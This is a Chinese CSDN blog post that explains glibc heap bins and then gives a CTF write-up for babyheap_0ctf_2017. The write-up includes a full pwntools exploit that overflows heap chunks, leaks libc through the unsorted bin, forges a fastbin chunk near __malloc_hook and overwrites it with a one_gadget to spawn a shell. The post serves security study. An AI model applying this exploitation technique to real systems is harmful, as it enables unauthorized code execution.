【堆知识总结 | bins结构】fastbins attack:babyheap_0ctf_2017

已于 2023-08-20 00:04:28 修改
阅读量210 收藏
点赞数
文章标签: 安全 笔记
于 2023-08-20 00:03:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ethan18/article/details/132384224
版权

在堆漏洞这里面已经研究了差不多半个月了,虽然都还是很基础的知识,但是也差不多改收尾去看看别的部分的知识了,遇到不会的堆的题目(大概率会有)再来写堆题目的wp吧

想要或多或少总结一下堆chunk里面的一些漏洞,但我做的题也不多,所以能够写的也只有我理解的小小的一部分,并且有点想一出是一出。如果有看我博客的师傅的话请原谅一下哈哈哈。

堆的结构

chunk的结构

首先是堆的结构,作为一个堆,它的结构我已经在之前的博客里面提到过,这里就不细说了。

Bins

bins的结构

bins是什么?在我的理解里面就是用来存储各种被free了的chunk,也就是一个缓冲区,当你要进行下一次的malloc或者是calloc时,直接会从Bins这个数组中来进行堆的获取

bins分为多种,但是用的多的也就几个(目前我知道的):Fastbins、Unsorted bins、small bins、large bins这几种

以下我画了个差不多的结构图:
在这里插入图片描述
(这里修改一下:每个数组中的值都是一个链表结构)
这里还有一个从网上找到的图
在这里插入图片描述

Unsorted bins处于数组[0]和[1],small bins处于数组[2]到数组[63],以此类推。这些bins中的链表皆是双向链表。

而fastbins的结构在其他地方,不在这个bins数组中,并且时单向链表,也就是说**chunk中的bk指针没有用。**一般来说,fastbins中的chunk的最大差不多是在0x70~0x80这个范围(加上header之后)

同时,unsorted指针的初始位置和main_arena地址偏移量是恒定的,也就是说和libc_base的偏移量是恒定的,可以根据这个来进行libc泄露

chunk如何进入small bins

chunk在从unsorted bins中,例如大小是0x100,如果此时系统malloc了一个大小0xf0的chunk,那么系统会将0x100的chunk进行切割,将0xf0进行分配,同时将0x10放进fastbins(如果被切割后剩下的比较大,那就被放进small bins这些里面)

堆漏洞

堆漏洞我就不一一整理了,建议去看ctf-wiki,这里主要是回顾一道基础堆例题

fastbins attack: babyheap_0ctf_2017

这道题在buuctf上也有,虽然是叫babyheap但是真的好难,感觉自己不知道啥时候才能独立做出来,希望后面可以

首先check一下
在这里插入图片描述
发现canary found,肯定不是栈溢出了
然后查看源代码
在这里插入图片描述
理清逻辑了,就是堆的经典套路,我们去看看fill
在这里插入图片描述
明显的堆溢出,直接进行fill就可以覆盖掉下一个chunk中的值,那我们也不需要考虑double free的问题了,直接堆溢出更方便

从我短暂的做题生涯中,对于做题来说无非就是,

  • libc泄露,找one_gadget_addr;用malloc_hook指针指向one_gadget_addr(这个gadget可以直接调用/bin/sh,one_gadget的安装教程在这里)
  • libc泄露,找system函数;知道scanf函数或者free的got表地址,把它改成system地址,相当于你输入后或者free后直接就调用system函数了(free的chunk里面内容是"/bin/sh"的话就会直接被认为是参数)

我们发现,没有system函数,肯定要搞libc泄露
在这里插入图片描述
从哪里泄露呢,我们想到,之前我讲过,unsorted bin地址和main_arena和libc的偏移都是固定的,那么可以把重点放在unsorted bins上

在我的感觉里,fastbin attack中double free主要是针对那种,两个地方指向一个chunk,然后free了一个chunk,另一个指针就可以获取到此时处于bins中的chunk的信息。

比如说,unsorted bin的地址

所以我们可以进行这样的操作:
将1、2号直接free,然后通过0号修改1号,修改bins中1号的fd地址是4号,再进行malloc,这样我们可以得到的就是这样:(图是别的师傅画的)
在这里插入图片描述
这样就可以实现我们的操作了,将4号free掉,可以进unsorted bins中,在通过2号的打印操作
这部分代码如下

payload= b"a"*0x10 + p64(0)+p64(0x21)+ p8(0x80)
fill(0,len(payload),payload)

payload= b"a"*0x10 + p64(0)+p64(0x21)
fill(3,len(payload),payload)

allocate(0x10)
allocate(0x10)

payload= b"a"*0x10 + p64(0)+p64(0x91)
fill(3,len(payload),payload)

allocate(0x10)  # 防止和top chunk合并
myfree(4)   

dump(2)

我们就可以知道unsorted bins 的地址了,也可以知道libc的地址了

main_arena = unsortedbin_addr - 0x58
libc_base = main_arena - 0x3c4b20

我们现在得到了关于libc的地址,接下来可以试着使用one_gadget和malloc_hook
我在这道题才知道malloc_hook原来可以用在calloc上,惊了真的

我们注意,此时我们能够修改的方式只有通过改chunk的值,所以在我们进行修改的时候我们必须从malloc_hook附近的一个地方开始将malloc_hook包含进来
在这里插入图片描述
我们可以试出,这个地址是和libc_base偏移恒定的,同时我们可以这样构造

在这里插入图片描述
可以看出这个0x7f,这是在fastbins的范围里面(甚至可以说是最大的值了)

malloc(0x60),将4号free,顺便拆分,变成0x70大小的chunk,进入fastbins,然后通过2号仍旧存在的指针修改其fd为0x7f718b3c3aed,也就是假chunk的地址,这样就可以进行malloc_hook修改了

总体代码:

from pwn import *
import warnings
from LibcSearcher import *


warnings.filterwarnings("ignore")
sh=process("./babyheap_0ctf_2017")
# sh = remote("node4.buuoj.cn","29436")

elf=ELF("./babyheap_0ctf_2017")
free_got=elf.got['free']

#context.log_level='debug'

def allocate(size):
    sh.recvuntil("Command: ")
    sh.sendline('1')
    sh.recvuntil("Size: ")
    sh.sendline(str(size))


def fill(idx, size, content):
    sh.recvuntil("Command: ")
    sh.sendline('2')
    sh.recvuntil("Index: ")
    sh.sendline(str(idx))
    sh.recvuntil("Size: ")
    sh.sendline(str(size))
    sh.recvuntil("Content: ")
    sh.sendline(content)

def myfree(idx):
    sh.recvuntil("Command: ")
    sh.sendline('3')
    sh.recvuntil("Index: ")
    sh.sendline(str(idx))

def dump(idx):
    sh.recvuntil("Command: ")
    sh.sendline('4')
    sh.recvuntil("Index: ")
    sh.sendline(str(idx))

allocate(0x10)
allocate(0x10)
allocate(0x10)
allocate(0x10)
allocate(0x80)

myfree(2)
myfree(1)




payload= b"a"*0x10 + p64(0)+p64(0x21)+ p8(0x80)
fill(0,len(payload),payload)

payload= b"a"*0x10 + p64(0)+p64(0x21)
fill(3,len(payload),payload)

allocate(0x10)
allocate(0x10)

payload= b"a"*0x10 + p64(0)+p64(0x91)
fill(3,len(payload),payload)

allocate(0x10)  # 防止和top chunk合并
myfree(4)   

dump(2)

sh.recvuntil("Content: \n")
unsortedbin_addr = u64(sh.recv(8))
print(hex(unsortedbin_addr))

main_arena = unsortedbin_addr - 0x58
libc_base = main_arena - 0x3c4b20

allocate(0x60)
	
myfree(4)

fake_chunk_addr = main_arena - 0x33
payload = p64(fake_chunk_addr)

fill(2,len(payload),payload)

allocate(0x60)
allocate(0x60)

one_gadget_addr = libc_base + 0x4526a
payload = 0x13 * b'a' + p64(one_gadget_addr)
fill(6, len(payload), payload)

allocate(0x100)
sh.interactive()
ethanyi9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一个实例讲解fastbins上的利用
小强的博客
09-06 1438
这道题是hctf2016年“就是干”那道题。附件有下载地址及writeup。我就是分析一下: 首先IDA分析一下: 新建两个结构体 00000000 str_struct struc ; (sizeof=0x20) 00000000 str dq ? 00000008 str_padding dq ? 00000010 size
[pwn]fastbin attack详解
热门推荐
Breeze的博客
12-31 1万+
[pwn]fastbin attack 文章目录[pwn]fastbin attackfastbin attack原理double freeuse after freechunk extend需要注意的点:0ctf:babyheap fastbin attack原理 fastbin attack是利用fastbin分配原理的漏洞,利用要求是我们能够修改“已释放”块。通常情况下与double fr...
漏洞挖掘——fastbin attack漏洞
董哥的黑板报
08-12 3156
一、核心思想 通过fastbins链的管理,达到目标地址(target)读写 二、原理图解 fastbin存储freechunk的单链表结构fastbins是如何存取fastchunk的,见文章:https://blog.csdn.net/qq_41453285/article/details/97613588 第一步:我们知道被free的chunk会被放入到arena所管理的f...
判断unsigned long long乘法溢出_二进制安全溢出(系列)—— fast bin attack
weixin_39768444的博客
11-25 62
本文是二进制安全溢出系列的第八章节,主要介绍fast bin attack。原理从fastbin中分配块的检测机制if (__builtin_expect (victim_idx != idx, 0)) //检查当前所属idx的size和target的size是否匹配 malloc_printerr ("malloc(): memory corruption (fast)"); do_che...
fastbin attack快速入门
abelxu
11-13 1127
0x01 fastbin简介 Fastbin包含0x20~0x80大小bin的数组指针,用于快速分配小块。fastbin按照单链表结构进行组织,相同大小的bin在同一个链表中,fd指向下一个bin,采用LIFO(Last In First Out)机制。在fastbin中,块的inuse标志都为1,处于占用状态,防止chunk释放时进行合并,加快小块的分配。 正常fastbin的使用 通过这个简单的案例来了解fastbin的单链表结构,malloc和free的过程。 #include<stdio
一个实例讲解fastbins上的利用附件
09-06
在IT安全领域,尤其是逆向工程和漏洞利用中,了解操作系统...通过分析这个实例,你可以学习到如何查找和利用与fastbins相关的内存漏洞,这对于提升你的安全技能和参加CTF(Capture The Flag)比赛都是非常有价值的。
1D_DOA.zip_bartlett处理器_frequency bins DOA_到达方向估计_宽带 DOA_宽带DOA
07-15
到达方向(DOA)估计 ------------------------------------- 波达方向的估计与自由场,远场模式。 窄带或宽带(非相干)的处理。 DOA_Bartlett.m 巴特利特(延迟与求和)操纵响应能力。...
nas_user_bins:我的 NAS 脚本
06-15
在压缩包 "nas_user_bins-master" 中,我们可以预期找到的是一个包含多个 JavaScript 脚本的文件夹结构,每个脚本可能对应一个特定的 NAS 管理功能。通过解压并研究这些文件,我们可以了解脚本的工作原理,甚至定制...
CoMS_fastq_to_bins:从读取中创建垃圾箱
03-30
CoMS_fastq_to_bins 从读取中创建垃圾箱从Fastq到Bins数据专门针对所有5个样本的“高复杂度” fastq文件。阅读质量控制测序运行返回的读数并不完美,因此通常需要进行一些纠正,以使错误不会从测序读数传播到其他...
cambridge_bins:英国剑桥的垃圾收集通知
05-02
cambridge_bins 报废剑桥市议会网站的垃圾收集日期: 如果明天需要将垃圾箱发送出去,则发送消息: $ ./check_collection_date.py '324 Mill Road' 'CB1 3NN' blue $ ./check_collection_date.py '11 Rustat Road...
客户端与服务器通讯详解(5):安全威胁与应对策略
贝格前端工场的博客
07-23 257
在进行客户端与服务器通讯的时候,要时刻防范安全威胁,后端有一句名言“永远不要相信用户在前端的输入”,就是说客户端和服务器之间通讯,必须有严密的规则。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
亚信安全官方账号的博客
07-19 500
一站式云安全托管限时试用 开启全能高效攻防
Vue的安全性:防范XSS攻击与安全最佳实践
哎 你看的博客
07-19 635
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者关注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue中的安全最佳实践。
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 1111
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
自媒体创作、小说推文等网赚项目安全吗?网络兼职需要注意什么?
2401_86131344的博客
07-23 109
综上所述,自媒体创作和小说推文等网赚项目在遵守相关规定和采取正确操作方式的前提下是安全的。- 在自媒体创作和小说推文的过程中,要严格遵守平台的相关规定和规则,避免违规行为导致账号被封禁或收益被扣除。自媒体创作和小说推文等网赚项目本身**可以**是安全的,但前提是要采取正确的操作方式和遵守相关规定。- 对于小说推文,要选择正规的小说平台进行合作,例如知乎、起点、飞卢等。
[Linux安全运维] OpenVPN部署
Da1NtY的博客
07-19 1196
同样的,在创建服务端证书的时候也需要输入一个Common Name用户名,注意与根证书用户名不一样。下载网址: https://github.com/OpenVPN/easy-rsa。2.6.1 将服务端所需的必要文件放到/etc/openvpn/中。2.6.2 将客户端所需的必要文件放到/root/client/中。创建/etc/openvpn/目录,将easy-rsa放进去。签约证书需要输入根证书的密码,与签约服务端证书时的过程一样。在日志文件/var/log/中创建一个openvpn/
构建稳固与安全的网络环境:从微软蓝屏事件看软件更新流程与应急响应
最新发布
CSDNsunyue的博客
07-23 470
近日,由微软视窗系统软件更新引发的全球性“微软蓝屏”事件,不仅让科技领域为之震动,更是一次对全球IT基础设施韧性与安全性的深刻检验。这次事件源于美国电脑安全技术公司“众击”的一次带有“缺陷”的软件更新,其影响范围之广、程度之深,令人震惊。本文将从软件更新流程中的风险管理和质量控制机制、预防类似大规模故障的最佳方案或应急响应对策,以及跨领域连锁反应的行业影响三个方向,深入探讨如何构建更加稳固和安全的网络环境。
【Java安全】基础配置篇-01
jayq1的博客
07-19 1618
Java安全基础学习篇
便宜多域名SSL证书申请平台推荐
osfipin note
07-23 439
随着互联网的深入发展,网络安全问题愈发受到重视。SSL证书作为保障网站和用户数据安全的重要工具,其重要性不言而喻。在众多SSL证书类型中,多域名SSL证书因其独特的功能和优势,逐渐成为企业和个人保护网站安全的首选。
for i in range(bins_l-1,0,-1):
05-11
这是一个简单的 Python 循环语句。其中 `range(bins_l-1, 0, -1)` 意味着从 `bins_l-1` 到 1(不包含 1),步长为 -1,即倒序循环。循环变量 `i` 依次取到从 `bins_l-1` 到 1 的所有整数值。在循环体中,可以对 `i` 进行操作,实现对一个序列的倒序遍历。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值